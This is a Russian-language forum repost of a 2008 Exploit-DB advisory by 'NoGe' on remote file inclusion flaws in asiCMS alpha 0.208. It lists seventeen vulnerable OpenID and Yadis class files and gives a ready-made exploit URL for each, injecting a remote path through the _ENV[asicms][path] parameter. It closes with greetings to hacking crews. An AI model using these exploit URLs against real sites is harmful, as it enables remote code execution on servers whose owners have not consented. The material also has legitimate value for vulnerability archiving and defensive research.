Exploit asiCMS alpha 0.208 - Multiple Remote File Inclusions

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6685
Проверка EDB
  1. Пройдено
Автор
NOGE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-4529
Дата публикации
2008-10-06
Код:
===========================================================================================


  [o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability

       Software : asiCMS version alpha 0.208
       Vendor   : http://asicms.sourceforge.net/
       Download : http://sourceforge.net/project/showfiles.php?group_id=203457
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com


===========================================================================================


  [o] Vulnerable file

       classes/Auth/OpenID/Association.php
       classes/Auth/OpenID/BigMath.php
       classes/Auth/OpenID/DiffieHellman.php
       classes/Auth/OpenID/DumbStore.php
       classes/Auth/OpenID/Extension.php
       classes/Auth/OpenID/FileStore.php
       classes/Auth/OpenID/HMAC.php
       classes/Auth/OpenID/MemcachedStore.php
       classes/Auth/OpenID/Message.php
       classes/Auth/OpenID/Nonce.php
       classes/Auth/OpenID/SQLStore.php
       classes/Auth/OpenID/SReg.php
       classes/Auth/OpenID/TrustRoot.php
       classes/Auth/OpenID/URINorm.php
       classes/Auth/Yadis/XRDS.php
       classes/Auth/Yadis/XRI.php
       classes/Auth/Yadis/XRIRes.php

      All the file is affected by _ENV[asicms][path] variable



  [o] Exploit

       http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=
       http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=


===========================================================================================


  [o] Greetz

       MainHack BrotherHood [ www.mainhack.com ]
       VOP Crew [ Vaksin13 OoN_BoY Paman ]
       H312Y yooogy mousekill }^-^{ k1tk4t
       skulmatic olibekas ulga Cungkee str0ke

        
===========================================================================================

# milw0rm.com [2008-10-06]
 
Источник
www.exploit-db.com

Похожие темы